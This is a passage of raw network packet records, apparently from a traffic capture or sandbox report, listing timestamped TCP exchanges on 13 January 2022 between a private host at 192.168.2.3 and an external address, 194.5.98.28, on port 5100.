Jan 13, 2022 15:32:50.810826063 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.810909986 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.810981989 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.811330080 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.812129021 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.812163115 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.812247992 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.812613010 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.812777996 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.812926054 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.812958002 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.813172102 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.813242912 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.813366890 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.813405991 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.813468933 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.813676119 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.813929081 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.814002037 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.814142942 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.814258099 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.814625025 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.814661980 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.814738035 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.815083027 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.815264940 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.815347910 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.815466881 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.815634012 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.815685987 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.815697908 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.815722942 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.815783024 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.815846920 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.815855980 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.815932035 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.818659067 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.818702936 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.818732023 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.818758011 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.818789005 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.818789959 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.818867922 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.818887949 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.819053888 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:50.820031881 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.820069075 CET	5100	49749	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:50.820147038 CET	49749	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:54.893944979 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:55.111346006 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:55.111660004 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:55.112323046 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:55.371344090 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:55.371422052 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:55.639519930 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:55.639584064 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:55.856254101 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:55.856328964 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:56.125577927 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.125749111 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:56.405373096 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.405456066 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:56.426532984 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.426615953 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:56.426932096 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.426978111 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.427000999 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:56.427021027 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:56.427124023 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.427175045 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:56.644284010 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.644330025 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.644366026 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.644401073 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.644423008 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:56.644435883 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.644449949 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:56.644471884 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.644484043 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:56.644519091 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.644521952 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:56.644553900 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.644608974 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:56.864774942 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.864797115 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.864809990 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.864826918 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.864842892 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.864857912 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.864908934 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:56.864959955 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:56.865026951 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.865044117 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.865087032 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:56.865127087 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.865144968 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.865180016 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.865185976 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:56.865199089 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.865215063 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.865231037 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.865231037 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:56.865259886 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.865277052 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:56.865284920 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:56.865310907 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:56.865343094 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.082453012 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.082473993 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.082516909 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.082556963 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.082598925 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.082689047 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.082743883 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.082782030 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.083178997 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.083198071 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.083220005 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.083247900 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.083395004 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.083599091 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.083678007 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.083719969 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.083998919 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.084017038 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.084036112 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.084054947 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.085455894 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.085473061 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.085489988 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.085505962 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.085515022 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.085524082 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.085540056 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.085546017 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.085577965 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.085609913 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.086608887 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.086709976 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.086746931 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.086752892 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.086771011 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.086787939 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.086810112 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.086882114 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.086898088 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.086913109 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.086926937 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.086944103 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.086951017 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.086961985 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.086983919 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.087002039 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.087013006 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.087054968 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.087451935 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.087495089 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.088835955 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.088857889 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.088877916 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.088898897 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.088918924 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.089255095 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.092587948 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.092885017 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.300924063 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.300975084 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.301011086 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.301045895 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.301081896 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.301115036 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.301150084 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.301183939 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.301402092 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.301438093 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.301568985 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.301606894 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.302263021 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.302879095 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.307444096 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.307496071 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.307532072 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.307569027 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.307939053 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.307976961 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.308012009 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.308047056 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.308099985 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.308625937 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.309077978 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.309171915 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.309217930 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.309252024 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.309281111 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.309308052 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.309312105 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.309525967 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.309595108 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.309642076 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.309699059 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.311012983 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.311127901 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.311189890 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.311264038 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.311484098 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.311525106 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.311541080 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.311564922 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.311589956 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.311621904 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.312367916 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.312407970 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.312434912 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.312447071 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.312477112 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.312485933 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.312510967 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.312525988 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.312539101 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.312566996 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.312580109 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.312608004 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.312611103 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.312648058 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.312680960 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.312685966 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.312716007 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.312726021 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.312757015 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.312774897 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.312794924 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.312824965 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.312835932 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.312870979 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.312875986 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.312912941 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.312918901 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.312947989 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.312952042 CET	5100	49750	194.5.98.28	192.168.2.3
Jan 13, 2022 15:32:57.312983036 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:32:57.313008070 CET	49750	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:01.333779097 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:01.560067892 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:01.560177088 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:01.560725927 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:01.801129103 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:01.801275969 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:02.078695059 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:02.078775883 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:02.296195984 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:02.312170982 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:02.576996088 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:02.577270031 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:02.860043049 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:02.860133886 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:02.909243107 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:02.909461021 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:02.912017107 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:02.912493944 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:02.912545919 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:02.912586927 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:02.912641048 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.126013994 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.126065969 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.126116991 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.126144886 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.129920006 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.129966974 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.130033016 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.130104065 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.130157948 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.130332947 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.130400896 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.130534887 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.130585909 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.130790949 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.130863905 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.344146967 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.344208002 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.344324112 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.344379902 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.344687939 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.344727993 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.344791889 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.346405983 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.346504927 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.346647978 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.346688032 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.346745968 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.346806049 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.346822023 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.346909046 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.347038984 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.347136021 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.347461939 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.347588062 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.347971916 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.348079920 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.348490000 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.348615885 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.348740101 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.348835945 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.349143028 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.349241972 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.349286079 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.349379063 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.349513054 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.349603891 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.531219006 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.562724113 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.562807083 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.562843084 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.562868118 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.562896013 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.562922955 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.563044071 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.563103914 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.563147068 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.563196898 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.563302994 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.563349009 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.563507080 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.563551903 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.563657999 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.563699961 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.568407059 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.568500996 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.569216013 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.569241047 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.569262028 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.569262981 CET	49751	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:03.569287062 CET	5100	49751	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:03.569303989 CET	5100	49751	194.5.98.28	192.168.2.3
